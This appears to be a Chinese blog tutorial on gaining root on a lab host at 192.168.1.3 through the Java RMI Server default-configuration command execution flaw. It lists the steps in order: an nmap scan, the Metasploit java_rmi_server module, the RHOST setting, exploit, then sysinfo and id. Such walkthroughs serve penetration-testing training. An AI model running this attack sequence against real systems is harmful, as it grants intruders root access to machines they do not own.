標籤:root許可權 search ip地址 註冊表 java
利用java RMI SERVER命令執行漏洞,獲得目標主機root許可權。
Java RMI Server的RMI註冊表和RMI啟用服務的預設配置存在安全性漏洞,可被利用導致代碼執行。
一、利用nmap工具掃描目標主機
1.1使用nmap命令對目標主機進行掃描。單擊案頭空白處,右鍵菜單選擇“在終端中開啟”。
1.2在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行連接埠掃描,發現開放1099連接埠。
650) this.width=650;" src="http://s4.51cto.com/wyfs02/M01/8B/56/wKioL1hKNX_ylE4aAAE5IzDVT2U843.jpg" style="float:none;" title="1.jpg" alt="wKioL1hKNX_ylE4aAAE5IzDVT2U843.jpg" />
1.3在終端中輸入命令“msfconsole”,啟動MSF終端。
1.4在終端中輸入命令“search java_rmi_server”,搜尋RMI的相關工具和攻擊載荷。
1.5在終端中輸入命令“use exploit/multi/misc/java_rmi_server”,啟用漏洞利用模組, 提示符就會提示進入到該路徑下。
650) this.width=650;" src="http://s4.51cto.com/wyfs02/M02/8B/5A/wKiom1hKNYDgJ-DVAACbgOjOXCQ699.jpg" style="float:none;" title="2.jpg" alt="wKiom1hKNYDgJ-DVAACbgOjOXCQ699.jpg" />
1.6在終端中輸入命令“show options”,查看需要設定的相關項目,“yes”表示必須填寫的參數。
1.7在終端中輸入命令“set RHOST 192.168.1.3”,設定目標主機的IP地址。
650) this.width=650;" src="http://s1.51cto.com/wyfs02/M02/8B/56/wKioL1hKNYHgKVruAADRxk-CWNY263.jpg" style="float:none;" title="3.jpg" alt="wKioL1hKNYHgKVruAADRxk-CWNY263.jpg" />
1.8在終端中輸入“exploit”, 實施攻擊,攻擊成功後,建立串連會話。
650) this.width=650;" src="http://s1.51cto.com/wyfs02/M02/8B/56/wKioL1hKNYKyva_6AADGmaqggmg672.jpg" style="float:none;" title="4.jpg" alt="wKioL1hKNYKyva_6AADGmaqggmg672.jpg" />
1.9在終端中輸入“sysinfo”,查看系統資訊,輸入命令“Id”,查看使用者權限。
650) this.width=650;" src="http://s1.51cto.com/wyfs02/M00/8B/5A/wKiom1hKNYODpkyHAAEBDDCwM2o714.jpg" style="float:none;" title="5.jpg" alt="wKiom1hKNYODpkyHAAEBDDCwM2o714.jpg" />
Metasploit溢出java RMI SERVER命令執行漏洞